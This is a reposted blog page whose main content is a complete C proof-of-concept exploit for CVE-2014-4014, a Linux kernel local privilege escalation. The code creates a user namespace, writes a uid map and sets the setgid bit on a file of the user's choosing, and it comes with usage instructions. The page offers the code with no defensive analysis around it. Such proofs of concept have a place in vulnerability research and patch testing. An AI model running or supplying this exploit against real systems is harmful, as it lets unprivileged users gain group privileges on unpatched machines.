zoukankan      html  css  js  c++  java
  • CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**
     * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
     *
     * Vitaly Nikolenko
     * http://hashcrack.org
     *
     * Usage: ./poc [file_path]
     *
     * where file_path is the file on which you want to set the sgid bit
     */
    #define _GNU_SOURCE
    #include <sys/wait.h>
    #include <sched.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <limits.h>
    #include <string.h>
    #include <assert.h>
     
    #define STACK_SIZE (1024 * 1024)
    static char child_stack[STACK_SIZE];
     
    struct args {
        int pipe_fd[2];
        char *file_path;
    };
     
    static int child(void *arg) {
        struct args *f_args = (struct args *)arg;
        char c;
     
        // close stdout
        close(f_args->pipe_fd[1]);
     
        assert(read(f_args->pipe_fd[0], &c, 1) == 0);
     
        // set the setgid bit
        chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);
     
        return 0;
    }
     
    int main(int argc, char *argv[]) {
        int fd;
        pid_t pid;
        char mapping[1024];
        char map_file[PATH_MAX];
        struct args f_args;
     
        assert(argc == 2);
     
        f_args.file_path = argv[1];
        // create a pipe for synching the child and parent
        assert(pipe(f_args.pipe_fd) != -1);
     
        pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
        assert(pid != -1);
     
        // get the current uid outside the namespace
        snprintf(mapping, 1024, "0 %d 1 ", getuid());
     
        // update uid and gid maps in the child
        snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
        fd = open(map_file, O_RDWR); assert(fd != -1);
     
        assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
        close(f_args.pipe_fd[1]);
     
        assert (waitpid(pid, NULL, 0) != -1);
    }
  • 相关阅读:
    极光推送
    ModelAndView跳转页面的时候,显示了页面的源码问题
    关于字符串比较时候出现的空指针问题的坑
    JAVA的extends用法
    C# 平面文件批量导数据到DB(二)
    C# 平面文件批量导数据到DB(一)
    C#操作文件和文件夹的类介绍
    C# 实现监控文件夹和里面文件的变化
    SQL Server 2012 Throw关键字
    SQL SERVER EXCEPT 和 INTERSECT
  • 原文地址:https://www.cnblogs.com/bittorrent/p/3854628.html
Copyright © 2011-2022 走看看